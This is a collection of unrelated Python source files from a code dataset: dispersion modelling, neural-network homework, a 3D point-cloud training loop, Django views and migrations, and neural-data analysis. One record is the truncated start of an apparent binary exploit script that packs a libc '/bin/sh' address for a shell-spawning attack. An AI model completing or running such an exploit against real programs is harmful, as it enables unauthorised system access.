C=(Q/u)*(math.exp((-y**2)/(2*sig2y))/(2*math.pi*sigz*sigy))*secondpart\n return C\n\n\ndef runmodel(graph,H,Q,u,I,R,clouds,stabilityclasses):\n xmax=100.02\n Xlist= np.arange(0.1,xmax,0.1) #Xlist= np.arange(0.001,20,0.001)\n Ylist=np.arange(-5,5,0.1) # Zlist=np.arange(0,H*2,0.1)\n z=0\n times=['Day','Night']\n maxdistances={}\n for time in times:\n allCs=[]\n allXs=[]\n allYs=[]\n for x in Xlist:\n for y in Ylist:\n stabilityclass=stabilityclasses[time]\n C=calculateCs(stabilityclass,x,y,z,H,Q,u,I,R,time)\n allCs.append(C)\n allYs.append(y)\n allXs.append(x)\n\n\n str_img=graph_2D(allXs,allYs,allCs,stabilityclass,u,time)\n\n Ccum = np.cumsum(allCs)\n max99=max(Ccum)*0.999\n max95=max(Ccum)*0.95\n max75=max(Ccum)*0.75\n max50=max(Ccum)*0.50\n\n X99 = round(allXs[[n for n,i in enumerate(Ccum) if i> max99][0]],1)\n X95 = round(allXs[[n for n,i in enumerate(Ccum) if i> max95][0]],1)\n X75 = round(allXs[[n for n,i in enumerate(Ccum) if i> max75][0]],1)\n X50 = round(allXs[[n for n,i in enumerate(Ccum) if i> max50][0]],1)\n\n valuesaty0=[]\n Xmax=\"more than 100\"\n for i,x in enumerate(allXs):\n if str(round(allYs[i],2))==\"-0.0\" or str(round(allYs[i],2))==\"0.0\":\n if allCs[i]<1 and x>X99:\n Xmax=round(x,2)\n break\n\n maxdistances[time]=[X95,X75,X50,X99,Xmax,str_img]\n return maxdistances\n","sub_path":"dispersal/GPModel/GPM_django_PF.py","file_name":"GPM_django_PF.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"401997026","text":"# 人工神经网络第四次作业1-2,异联想DHNN\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport copy\nfrom numpy import nan\nfrom typing import Optional\ndef data_loader(path): # 数据生成:获得全部数据\n with open(path,'r',encoding='UTF-8') as f:\n data = []\n for line in f:\n d = [int(j) for j in line.strip()]\n data.append(d)\n return np.array(data)\ndef visualize(W,title,xlabel,ylabel,path): # 可视化\n plt.clf()\n for i,w in enumerate(W):\n cols,rows = np.where(w.reshape(7,5) != nan)\n plt.subplot(2,4,i+1)\n ax = plt.gca() # 获取到当前坐标轴信息\n ax.xaxis.set_ticks_position('top') # 将X坐标轴移到上面\n ax.invert_yaxis() # 翻转y轴\n plt.margins(0.1)\n plt.scatter(rows,cols,s=w*100,alpha=0.8,c=np.random.RandomState(0).rand(len(rows)),cmap='Dark2') # 绘制字符点\n plt.grid(visible=False) # 不显示网格线\n plt.draw()\n plt.tight_layout() # 自适应调整子图大小\n plt.savefig(path) # 保存图像\ndef bam(W,x,y_last): # X状态更新\n \"\"\"\n input : W: connnection weight; x: flattrend letter vector, \n output: y: predection for x; x_new: updated x; ee: energy\n \"\"\"\n y = np.sign(x @ W) # 1x3\n y[np.where(y==0)] = y_last[np.where(y==0)]\n x_new = np.sign(y @ W.T) # 1x35\n x_new[np.where(x_new==0)] = x[np.where(x_new==0)]\n return x_new,y\ndef cal_energy(W,x,y): # 计算当前的能量函数值\n return -((x @ W) @ y)\ndef addnoise(c,noise_ratio = 0.1): # 按一定比例增加噪声\n noisenum = int(len(c) * noise_ratio)\n noisepos = [1]*len(c)\n noisepos[:noisenum] = [-1]*noisenum\n np.random.shuffle(noisepos)\n cc = np.array([x*y for x,y in zip(c,noisepos)])\n return cc\ndef showChar(c,offsetx,offsety,height,weight): # 单个字符绘制函数\n cc = list(zip(*([iter(c)]*weight)))\n x = [] # 非字符点\n y = []\n X = [] # 字符点\n Y = []\n for id,a in enumerate(cc):\n YY = offsety + height - id\n for iidd,b in enumerate(a):\n XX = offsetx + iidd\n if b == 0:\n x.append(XX)\n y.append(YY)\n else:\n X.append(XX)\n Y.append(YY)\n plt.scatter(x,y,s=50,alpha=1,marker='*') # 绘制非字符点\n plt.scatter(X,Y,s=500,alpha=0.8,c=np.random.RandomState(0).rand(len(X)),cmap='Dark2') # 绘制字符点\ndef calCharXY(id,height,weight): # 计算字符绘制坐标函数\n offsetx = id*height\n offsety = weight + 5\n if id >= 4:\n offsetx = (id-4)*height\n offsety = 0\n return offsetx,offsety\ndef savePltPic(title,xlabel,ylabel,path): # 我的标准保存图像函数\n font = {'family':'serif','style':'italic','weight':'bold','color':'black','size':20} # 设置标签字体\n plt.title(title,fontdict=font,fontsize=18) # 显示传递函数类型\n plt.xlabel(xlabel,fontdict=font,fontsize=15) # 设置x轴标签\n plt.ylabel(ylabel,fontdict=font,fontsize=15) # 设置y轴标签\n plt.grid(visible=False) # 不显示网格线\n plt.tight_layout() # 自适应调整子图大小\n plt.savefig(path) # 保存图像\n plt.close() # 关闭图像\nnp.random.seed(1) # 设置随机数种子\nplt.rcParams['figure.figsize'] = (12,8)\ndata_path = './DATA/char.txt' # 八字母数据集路径\nnumber_data = data_loader(data_path) # 读取八字母数据集\nCharStr = np.array(['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']) # 字母列表初始化,选择ZHUOQING一共8个字母\ntarget = np.array(['G','N','I','Q','O','U','H','Z'])\n# 生成训练数据和标签\nX = [] # 8x35\nY = [] # 8x3\nfor index,letter in enumerate(target):\n id_ = np.where(CharStr == letter)[0][0]\n X.append(number_data[id_])\n bi = bin(index).replace('0b','')\n la = np.array([int(i) for i in f'{bi:0>3}'])\n la[la == 0] = -1\n Y.append(la)\nif False: # 绘制八字母数据集\n for id,xx in enumerate(X):\n offsetx,offsety = calCharXY(id=id,height=7,weight=5) # 计算字符绘制坐标\n showChar(c=xx,offsetx=offsetx,offsety=offsety,height=7,weight=5) # 绘制单个字符\n savePltPic(title='Alphabet dataset',xlabel='x',ylabel='y',path='./OUTPUT/8number_char.jpg')\nX = np.array(X).astype('float32')*2-1 # 二进制(0,1)转换为双极性(-1,1)\nY = np.array(Y).astype('float32')\nw_matrix = X.T @ Y # 计算权系数矩阵W\nif False: # 绘制权系数矩阵\n plt.imshow(w_matrix)\n savePltPic(title='Weight coefficient matrix',xlabel='x',ylabel='y',path='./OUTPUT/8number_w.jpg')\nenergy = np.zeros(8) # 计算能量函数\nfor i in range(8):\n energy[i] = cal_energy(w_matrix,X[i],Y[i])\n# print(f'Energy: {energy}')\n# # 从噪声数据中还原到对应的标签\n# timeNum = 2\n# # plt.draw()\n# # plt.pause(0.2)\n# for noi in range(4): # 4种加噪声的结果\n# # 生成加噪声数据X_noise\n# X_noise = np.zeros(X.shape)\n# for i,x in enumerate(X):\n# X_noise[i] = addnoise(x,0.2) \n# # 保留原始数据,在X_copy上更新状\n# X_copy = X_noise.copy()\n# # visualize(X_copy,f'./OUTPUT/8number{noi}.png')\n# # 还原到对应的标签\n# for j,x in enumerate(X_noise): # 由于更新的是状态,权值不变,那么<对所有样本迭代一遍再重复time次>和<逐个对单个样本迭代time次> 一样\n# y = np.sign(x @ w_matrix)\n# for _ in range(timeNum): # 迭代次数\n# ee = cal_energy(w_matrix,x,y)\n# x,y = bam(w_matrix,x,y)\n# X_copy[j] = x\n# print(y,Y[j],(y==Y[j]).all()) \n# print('----------------------------------------')\n# # visualize(X_copy,f'./OUTPUT/v{noi}.png')","sub_path":"NeuralModel/ANN27.py","file_name":"ANN27.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"21979046","text":"from dictionaries.exe_1 import *\ndicSum=create_dic()\nprint(dicSum)\nkey = int(input(\"enter wanted key\"))\nfor i in dicSum.keys():\n print(i)\n if i==key:\n print(\"yes\")\n break\n else:\n print(\"no\")\ncreate_dic()","sub_path":"dictionaries/exe_2.py","file_name":"exe_2.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"362350392","text":"\"\"\"\n For models: model_v1_x.py\n\"\"\"\n\nimport os\nimport time\nimport sys\nimport shutil\nimport random\nfrom time import strftime\nfrom argparse import ArgumentParser\nimport numpy as np\nimport torch\nimport torch.utils.data\nimport torch.nn.functional as F\ntorch.multiprocessing.set_sharing_strategy('file_system')\nfrom PIL import Image\nfrom subprocess import call\nfrom sapien_data import PartNetSapienDataset\nimport utils\nfrom geometry_utils import render_pts\nimport sapien.core as sapien\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport logging\nlogger = logging.getLogger(\"trimesh\")\nlogger.setLevel(logging.ERROR)\n\n\ndef train(conf):\n # create training and validation datasets and data loaders\n data_features = ['pc', 'shape_id']\n\n train_dataset = PartNetSapienDataset(train=True)\n utils.printout(conf.flog, str(train_dataset))\n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=conf.batch_size, shuffle=True, pin_memory=True, \\\n num_workers=conf.num_workers, drop_last=True, collate_fn=utils.collate_feats, worker_init_fn=utils.worker_init_fn)\n\n val_dataset = PartNetSapienDataset(train=False)\n utils.printout(conf.flog, str(val_dataset))\n val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=conf.batch_size, shuffle=False, pin_memory=True, \\\n num_workers=0, drop_last=True, collate_fn=utils.collate_feats, worker_init_fn=utils.worker_init_fn)\n\n # load network model\n model_def = utils.get_model_module(conf.model_version)\n\n # create models\n network = model_def.Network(conf)\n utils.printout(conf.flog, '\\n' + str(network) + '\\n')\n\n models = [network]\n model_names = ['network']\n\n # create optimizers\n network_opt = torch.optim.Adam(network.parameters(), lr=conf.lr, weight_decay=conf.weight_decay)\n optimizers = [network_opt]\n optimizer_names = ['network_opt']\n\n # learning rate scheduler\n network_lr_scheduler = torch.optim.lr_scheduler.StepLR(network_opt, step_size=conf.lr_decay_every, gamma=conf.lr_decay_by)\n\n # create logs\n if not conf.no_console_log:\n header = ' Time Epoch Dataset Iteration Progress(%) LR ReconLoss KLDivLoss TotalLoss'\n if not conf.no_tb_log:\n # https://github.com/lanpa/tensorboard-pytorch\n from tensorboardX import SummaryWriter\n train_writer = SummaryWriter(os.path.join(conf.exp_dir, 'train'))\n val_writer = SummaryWriter(os.path.join(conf.exp_dir, 'val'))\n\n # send parameters to device\n for m in models:\n m.to(conf.device)\n for o in optimizers:\n utils.optimizer_to_device(o, conf.device)\n\n # start training\n start_time = time.time()\n\n last_checkpoint_step = None\n last_train_console_log_step, last_val_console_log_step = None, None\n train_num_batch = len(train_dataloader)\n val_num_batch = len(val_dataloader)\n\n # train for every epoch\n for epoch in range(conf.epochs):\n if not conf.no_console_log:\n utils.printout(conf.flog, f'training run {conf.exp_name}')\n utils.printout(conf.flog, header)\n\n train_batches = enumerate(train_dataloader, 0)\n val_batches = enumerate(val_dataloader, 0)\n train_fraction_done = 0.0\n val_fraction_done = 0.0\n val_batch_ind = -1\n\n # train for every batch\n for train_batch_ind, batch in train_batches:\n train_fraction_done = (train_batch_ind + 1) / train_num_batch\n train_step = epoch * train_num_batch + train_batch_ind\n\n log_console = not conf.no_console_log and (last_train_console_log_step is None or \\\n train_step - last_train_console_log_step >= conf.console_log_interval)\n if log_console:\n last_train_console_log_step = train_step\n\n # set models to training mode\n for m in models:\n m.train()\n\n # forward pass (including logging)\n total_loss = forward(batch=batch, data_features=data_features, network=network, conf=conf, is_val=False, \\\n step=train_step, epoch=epoch, batch_ind=train_batch_ind, num_batch=train_num_batch, start_time=start_time, \\\n log_console=log_console, log_tb=not conf.no_tb_log, tb_writer=train_writer, lr=network_opt.param_groups[0]['lr'])\n\n # optimize one step\n network_opt.zero_grad()\n total_loss.backward()\n network_opt.step()\n network_lr_scheduler.step()\n\n # save checkpoint\n with torch.no_grad():\n if last_checkpoint_step is None or train_step - last_checkpoint_step >= conf.checkpoint_interval:\n utils.printout(conf.flog, 'Saving checkpoint ...... ')\n utils.save_checkpoint(models=models, model_names=model_names, dirname=os.path.join(conf.exp_dir, 'ckpts'), \\\n epoch=epoch, prepend_epoch=True, optimizers=optimizers, optimizer_names=model_names)\n utils.printout(conf.flog, 'DONE')\n last_checkpoint_step = train_step\n\n # validate one batch\n while val_fraction_done <= train_fraction_done and val_batch_ind+1 < val_num_batch:\n val_batch_ind, val_batch = next(val_batches)\n\n val_fraction_done = (val_batch_ind + 1) / val_num_batch\n val_step = (epoch + val_fraction_done) * train_num_batch - 1\n\n log_console = not conf.no_console_log and (last_val_console_log_step is None or \\\n val_step - last_val_console_log_step >= conf.console_log_interval)\n if log_console:\n last_val_console_log_step = val_step\n\n # set models to evaluation mode\n for m in models:\n m.eval()\n\n with torch.no_grad():\n # forward pass (including logging)\n __ = forward(batch=val_batch, data_features=data_features, network=network, conf=conf, is_val=True, \\\n step=val_step, epoch=epoch, batch_ind=val_batch_ind, num_batch=val_num_batch, start_time=start_time, \\\n log_console=log_console, log_tb=not conf.no_tb_log, tb_writer=val_writer, lr=network_opt.param_groups[0]['lr'])\n\n # save the final models\n utils.printout(conf.flog, 'Saving final checkpoint ...... ')\n utils.save_checkpoint(models=models, model_names=model_names, dirname=os.path.join(conf.exp_dir, 'ckpts'), \\\n epoch=epoch, prepend_epoch=False, optimizers=optimizers, optimizer_names=optimizer_names)\n utils.printout(conf.flog, 'DONE')\n\n\ndef forward(batch, data_features, network, conf, \\\n is_val=False, step=None, epoch=None, batch_ind=0, num_batch=1, start_time=0, \\\n log_console=False, log_tb=False, tb_writer=None, lr=None):\n # prepare input\n input_pcs = torch.cat(batch[data_features.index('pc')], dim=0).to(conf.device) # B x N x 3\n batch_size = input_pcs.shape[0]\n\n # forward through the network\n output_pcs, pc_feats, ret_list = network(input_pcs) # B x N x 3, B x P\n\n # for each type of loss, compute losses per data\n recon_loss_per_data = network.get_loss(input_pcs, output_pcs)\n\n kldiv_loss_per_data = torch.zeros_like(recon_loss_per_data)\n if conf.probabilistic:\n kldiv_loss_per_data = ret_list['kldiv_loss']\n\n # for each type of loss, compute avg loss per batch\n recon_loss = recon_loss_per_data.mean()\n kldiv_loss = kldiv_loss_per_data.mean()\n\n # compute total loss\n total_loss = recon_loss + conf.kldiv_loss_weight * kldiv_loss\n\n # display information\n data_split = 'train'\n if is_val:\n data_split = 'val'\n\n with torch.no_grad():\n # log to console\n if log_console:\n utils.printout(conf.flog, \\\n f'''{strftime(\"%H:%M:%S\", time.gmtime(time.time()-start_time)):>9s} '''\n f'''{epoch:>5.0f}/{conf.epochs:<5.0f} '''\n f'''{data_split:^10s} '''\n f'''{batch_ind:>5.0f}/{num_batch:<5.0f} '''\n f'''{100. * (1+batch_ind+num_batch*epoch) / (num_batch*conf.epochs):>9.1f}% '''\n f'''{lr:>5.2E} '''\n f'''{recon_loss.item():>10.5f}'''\n f'''{kldiv_loss.item():>10.5f}'''\n f'''{total_loss.item():>10.5f}''')\n conf.flog.flush()\n\n # log to tensorboard\n if log_tb and tb_writer is not None:\n tb_writer.add_scalar('recon_loss', recon_loss.item(), step)\n tb_writer.add_scalar('kldiv_loss', kldiv_loss.item(), step)\n tb_writer.add_scalar('total_loss', total_loss.item(), step)\n tb_writer.add_scalar('lr', lr, step)\n\n # gen visu\n if is_val and (not conf.no_visu) and epoch % conf.num_epoch_every_visu == 0:\n visu_dir = os.path.join(conf.exp_dir, 'val_visu')\n out_dir = os.path.join(visu_dir, 'epoch-%04d' % epoch)\n input_pcs_dir = os.path.join(out_dir, 'input_pcs')\n output_pcs_dir = os.path.join(out_dir, 'output_pcs')\n info_dir = os.path.join(out_dir, 'info')\n\n if batch_ind == 0:\n # create folders\n os.mkdir(out_dir)\n os.mkdir(input_pcs_dir)\n os.mkdir(output_pcs_dir)\n os.mkdir(info_dir)\n\n if batch_ind < conf.num_batch_every_visu:\n utils.printout(conf.flog, 'Visualizing ...')\n\n for i in range(batch_size):\n fn = 'data-%03d.png' % (batch_ind * batch_size + i)\n\n # render_pts(os.path.join(input_pcs_dir, fn), input_pcs[i].cpu().numpy())\n # render_pts(os.path.join(output_pcs_dir, fn), output_pcs[i].cpu().numpy())\n # or to render using matplotlib\n utils.render_pc(os.path.join(input_pcs_dir, fn), input_pcs[i].cpu().numpy())\n utils.render_pc(os.path.join(output_pcs_dir, fn), output_pcs[i].cpu().numpy())\n\n with open(os.path.join(info_dir, fn.replace('.png', '.txt')), 'w') as fout:\n fout.write('shape_id: %s\\n' % batch[data_features.index('shape_id')][i])\n fout.write('recon_loss: %f\\n' % recon_loss_per_data[i].item())\n fout.write('kldiv_loss: %f\\n' % kldiv_loss_per_data[i].item())\n\n if batch_ind == conf.num_batch_every_visu - 1:\n # visu html\n utils.printout(conf.flog, 'Generating html visualization ...')\n sublist = 'input_pcs,output_pcs,info'\n cmd = 'cd %s && python %s . 10 htmls %s %s > /dev/null' % (out_dir, os.path.join(BASE_DIR, '../utils/gen_html_hierarchy_local.py'), sublist, sublist)\n call(cmd, shell=True)\n utils.printout(conf.flog, 'DONE')\n\n return total_loss\n\n\nif __name__ == '__main__':\n\n ### get parameters\n parser = ArgumentParser()\n\n # main parameters (required)\n parser.add_argument('--exp_suffix', type=str, help='exp suffix')\n parser.add_argument('--model_version', type=str, help='model def file')\n\n # main parameters (optional)\n parser.add_argument('--device', type=str, default='cuda:0', help='cpu or cuda:x for using cuda on GPU number x')\n parser.add_argument('--seed', type=int, default=3124256514, help='random seed (for reproducibility) [specify -1 means to generate a random one]')\n #parser.add_argument('--seed', type=int, default=-1, help='random seed (for reproducibility) [specify -1 means to generate a random one]')\n parser.add_argument('--log_dir', type=str, default='logs', help='exp logs directory')\n parser.add_argument('--data_dir', type=str, help='data directory')\n parser.add_argument('--val_data_dir', type=str, help='data directory')\n parser.add_argument('--overwrite', action='store_true', default=False, help='overwrite if exp_dir exists [default: False]')\n\n # network settings\n parser.add_argument('--num_point', type=int, default=2048)\n parser.add_argument('--decoder_type', type=str, default='fc')\n parser.add_argument('--loss_type', type=str, default='cd')\n parser.add_argument('--kldiv_loss_weight', type=float, default=1e-4)\n parser.add_argument('--probabilistic', action='store_true', default=False, help='probabilistic [default: False]')\n\n # training parameters\n parser.add_argument('--epochs', type=int, default=1000)\n parser.add_argument('--batch_size', type=int, default=16)\n parser.add_argument('--num_workers', type=int, default=5)\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--weight_decay', type=float, default=1e-5)\n parser.add_argument('--lr_decay_by', type=float, default=0.9)\n parser.add_argument('--lr_decay_every', type=float, default=5000)\n\n # loss weights\n\n # logging\n parser.add_argument('--no_tb_log', action='store_true', default=False)\n parser.add_argument('--no_console_log', action='store_true', default=False)\n parser.add_argument('--console_log_interval', type=int, default=10, help='number of optimization steps beween console log prints')\n parser.add_argument('--checkpoint_interval', type=int, default=10000, help='number of optimization steps beween checkpoints')\n\n # visu\n parser.add_argument('--num_batch_every_visu', type=int, default=1, help='num batch every visu')\n parser.add_argument('--num_epoch_every_visu', type=int, default=10, help='num epoch every visu')\n parser.add_argument('--no_visu', action='store_true', default=False, help='no visu? [default: False]')\n\n # parse args\n conf = parser.parse_args()\n\n\n ### prepare before training\n # make exp_name\n conf.exp_name = f'exp-{conf.model_version}-{conf.exp_suffix}'\n\n # mkdir exp_dir; ask for overwrite if necessary\n conf.exp_dir = os.path.join(conf.log_dir, conf.exp_name)\n if os.path.exists(conf.exp_dir):\n if not conf.overwrite:\n response = input('A training run named \"%s\" already exists, overwrite? (y/n) ' % conf.exp_name)\n if response != 'y':\n exit(1)\n shutil.rmtree(conf.exp_dir)\n os.mkdir(conf.exp_dir)\n os.mkdir(os.path.join(conf.exp_dir, 'ckpts'))\n if not conf.no_visu:\n os.mkdir(os.path.join(conf.exp_dir, 'val_visu'))\n\n # control randomness\n if conf.seed < 0:\n conf.seed = random.randint(1, 10000)\n random.seed(conf.seed)\n np.random.seed(conf.seed)\n torch.manual_seed(conf.seed)\n\n # save config\n torch.save(conf, os.path.join(conf.exp_dir, 'conf.pth'))\n\n # file log\n flog = open(os.path.join(conf.exp_dir, 'train_log.txt'), 'w')\n conf.flog = flog\n\n # backup command running\n utils.printout(flog, ' '.join(sys.argv) + '\\n')\n utils.printout(flog, f'Random Seed: {conf.seed}')\n\n # backup python files used for this training\n os.system('cp data.py models/%s.py %s %s' % (conf.model_version, __file__, conf.exp_dir))\n\n # set training device\n device = torch.device(conf.device)\n utils.printout(flog, f'Using device: {conf.device}\\n')\n conf.device = device\n\n ### start training\n train(conf)\n\n\n ### before quit\n # close file log\n flog.close()\n\n","sub_path":"exps/exp_baseline1/train_v1.py","file_name":"train_v1.py","file_ext":"py","file_size_in_byte":15280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"43277799","text":"from django.shortcuts import render,HttpResponse\nfrom layui import models\nfrom django.core import serializers\n\n# Create your views here.\ndef test(request):\n if request.method==\"GET\":\n print(\"用户已经创建\")\n # for i in range(0,100):\n # obj=models.Cuetomer.objects.create(name='我是%s号'%i,age=i)\n return render(request, 'test1.html')\n if request.method==\"POST\":\n print(request.POST.get(\"time\"),'time')\n\n return render(request, 'test1.html')\n\nimport json\n\ndef getinfo(request):\n if request.method==\"GET\":\n print(\"get_info geT\")\n return HttpResponse(\"GET\")\n if request.method==\"POST\":\n print('page',request.POST.get(\"start\"))\n page=request.POST.get(\"start\")\n\n print(\"来取数据了\")\n data=models.Cuetomer.objects.filter(id=page).values('name')[0]['name']\n print(data)\n ret = {'status': False, 'mydata': ''}\n ret['mydata'] = data\n # return render(request,'test1.html',{mydata:'123'})\n return HttpResponse(json.dumps(ret))\n\n\n\n\n\n","sub_path":"mylayui/layui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"364144198","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('name', '0015_insert_review_name_data'),\n ('group', '0008_auto_20160505_0523'),\n ('person', '0014_auto_20160613_0751'),\n ('doc', '0012_auto_20160207_0537'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='NextReviewerInTeam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('next_reviewer', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name': 'next reviewer in team setting',\n 'verbose_name_plural': 'next reviewer in team settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ResultUsedInReviewTeam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('result', models.ForeignKey(to='name.ReviewResultName')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name': 'review result used in team setting',\n 'verbose_name_plural': 'review result used in team settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReviewerSettings',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('min_interval', models.IntegerField(default=30, verbose_name=b'Can review at most', choices=[(7, b'Once per week'), (14, b'Once per fortnight'), (30, b'Once per month'), (61, b'Once per two months'), (91, b'Once per quarter')])),\n ('filter_re', models.CharField(help_text=b'Draft names matching regular expression should not be assigned', max_length=255, verbose_name=b'Filter regexp', blank=True)),\n ('skip_next', models.IntegerField(default=0, verbose_name=b'Skip next assignments')),\n ('remind_days_before_deadline', models.IntegerField(help_text=b\"To get an email reminder in case you forget to do an assigned review, enter the number of days before a review deadline you want to receive it. Clear the field if you don't want a reminder.\", null=True, blank=True)),\n ('person', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name_plural': 'reviewer settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReviewRequest',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('old_id', models.IntegerField(help_text=b'ID in previous review system', null=True, blank=True)),\n ('time', models.DateTimeField(default=datetime.datetime.now)),\n ('deadline', models.DateField()),\n ('requested_rev', models.CharField(help_text=b'Fill in if a specific revision is to be reviewed, e.g. 02', max_length=16, verbose_name=b'requested revision', blank=True)),\n ('reviewed_rev', models.CharField(max_length=16, verbose_name=b'reviewed revision', blank=True)),\n ('doc', models.ForeignKey(related_name='reviewrequest_set', to='doc.Document')),\n ('requested_by', models.ForeignKey(to='person.Person')),\n ('result', models.ForeignKey(blank=True, to='name.ReviewResultName', null=True)),\n ('review', models.OneToOneField(null=True, blank=True, to='doc.Document')),\n ('reviewer', models.ForeignKey(blank=True, to='person.Email', null=True)),\n ('state', models.ForeignKey(to='name.ReviewRequestStateName')),\n ('team', models.ForeignKey(to='group.Group')),\n ('type', models.ForeignKey(to='name.ReviewTypeName')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ReviewWish',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time', models.DateTimeField(default=datetime.datetime.now)),\n ('doc', models.ForeignKey(to='doc.Document')),\n ('person', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n 'verbose_name_plural': 'review wishes',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TypeUsedInReviewTeam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('team', models.ForeignKey(to='group.Group')),\n ('type', models.ForeignKey(to='name.ReviewTypeName')),\n ],\n options={\n 'verbose_name': 'review type used in team setting',\n 'verbose_name_plural': 'review type used in team settings',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UnavailablePeriod',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('start_date', models.DateField(default=datetime.date.today, help_text=b\"Choose the start date so that you can still do a review if it's assigned just before the start date - this usually means you should mark yourself unavailable for assignment some time before you are actually away.\")),\n ('end_date', models.DateField(help_text=b'Leaving the end date blank means that the period continues indefinitely. You can end it later.', null=True, blank=True)),\n ('availability', models.CharField(max_length=30, choices=[(b'canfinish', b'Can do follow-ups'), (b'unavailable', b'Completely unavailable')])),\n ('person', models.ForeignKey(to='person.Person')),\n ('team', models.ForeignKey(to='group.Group')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"ietf/review/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"216315239","text":"#!/usr/bin/python\nfrom struct import *\nimport os\n\n\nlibc_binsh = pack(\"= int(nSE * sub)], size=nselect)\n filteredactn = np.vstack((filteredactn1, filteredactn2))\n\n return filteredactn\n\n\ndef get_CPs(rates, pref_msk, actn, dt, smoothwin=100e-3, step=5):\n \"\"\"\n pref_msk is tailored to this population rates and it's a bool!\n get choice probability obtaining the distribution of each timepoint\n for active neurons of a population\n\n :param: rates: ntrls, nSE, timepoints\n :param: pref_msk:\n :param: actn:\n :param: dt:\n :param: smoothwin:\n :param: step:\n :return: aucs # CPs\n \"\"\"\n # params\n timepoints = rates.shape[2]\n this_time = np.linspace(0, timepoints, int(timepoints / step), dtype=int)[:-1]\n nselect = actn.shape[0]\n newdt = dt * step\n kernel = np.ones((int(smoothwin / newdt)))\n prefrates = rates[pref_msk == True, :, :]\n nprefrates = rates[pref_msk == False, :, :]\n\n # allocate variable to save CP\n aucs = np.zeros((nselect, this_time.shape[0]))\n smoothauc = aucs.copy()\n\n # for each neuron that is active\n for i, n in tqdm(enumerate(actn)):\n\n # define max rate of neuron\n maxrate = max(2, rates[:, n, :].max() + 1)\n\n # for each timepoint\n for j, t in enumerate(this_time):\n # get this rate across all trials\n pref = prefrates[:, n, t:t + step]\n npref = nprefrates[:, n, t:t + step]\n\n # hist\n x1, e1 = np.histogram(pref, bins=np.arange(maxrate), density=True)\n x2, e2 = np.histogram(npref, bins=np.arange(maxrate), density=True)\n\n # cumulative distribution\n cx1 = np.concatenate(([0], np.cumsum(x1)))\n cx2 = np.concatenate(([0], np.cumsum(x2)))\n\n # auc\n aucs[i, j] = mtr.auc(cx1, cx2) # reversed because pref > npref\n\n smoothauc[i] = np.convolve(aucs[i], kernel, mode='same') / (smoothwin/newdt)\n\n return smoothauc\n\n\ndef get_corr(rates, actn, dt, smoothwin=250e-3, step=10):\n \"\"\"\n Pearson correlations at each time point between two neurons\n bins are size step.\n\n :param: rates:\n :param: actn:\n :param: dt:\n :param: smoothwin:\n :param: step:\n :return: corrall, corrii, corrij\n \"\"\"\n # params\n timepoints = rates.shape[2]\n this_time = np.linspace(0, timepoints, int(timepoints / step), dtype=int)[:-1]\n actn1 = actn[0]\n actn2 = actn[1]\n nselect = actn.shape[1]\n\n # allocate variables\n corrs = np.zeros((nselect ** 2 * 2, this_time.shape[0]))\n corrs1 = np.zeros((nselect ** 2, this_time.shape[0]))\n corrs2 = corrs1.copy()\n\n # massive for loop through both subpopulations\n for i1, n1 in tqdm(enumerate(actn1)):\n for i2, n2 in enumerate(actn2):\n for j, t in enumerate(this_time):\n\n # get rates for each case\n x11 = rates[:, n1, t:t + step].mean(axis=1)\n x12 = rates[:, actn1[i2], t:t + step].mean(axis=1)\n\n x21 = rates[:, actn2[i1], t:t + step].mean(axis=1)\n x22 = rates[:, n2, t:t + step].mean(axis=1)\n\n x1 = rates[:, n1, t:t + step].mean(axis=1)\n x2 = rates[:, n2, 